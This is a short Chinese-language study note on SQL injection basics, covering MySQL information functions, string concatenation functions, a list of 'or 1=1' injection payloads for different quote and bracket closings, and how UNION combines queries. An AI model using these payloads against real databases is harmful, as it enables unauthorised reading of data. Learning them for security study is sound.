前置小知識點

系統函數

version()——MySQL 版本
user()——數據庫使用者名稱
database()——數據庫名
@@datadir——數據庫路徑
@@version_compile_os——操作系統版本

字串連線函數

• 1.concat(str1,str2,…)——沒有分隔符地連線字串
• 2.concat_ws(separator,str1,str2,…)——含有分隔符地連線字串
• 3.group_concat(str1,str2,…)——連線一個組的所有字串，並以逗號分隔每一條數據 說着比較抽象，其實也並不需要詳細瞭解，知道這三個函數能一次性查出所有資訊就行了。

一般用於替換的語句

or 1=1–+
'or 1=1–+
"or 1=1–+
)or 1=1–+
')or 1=1–+
") or 1=1–+
"))or 1=1–+

union 操作符

UNION 操作符用於合併兩個或多個 SELECT 語句的結果集。但是UNION 內部的 SELECT 語句必須擁有相同數量的列，列也必須擁有相似的數據型別。同時每條 SELECT 語句中的 列的順序必須相同。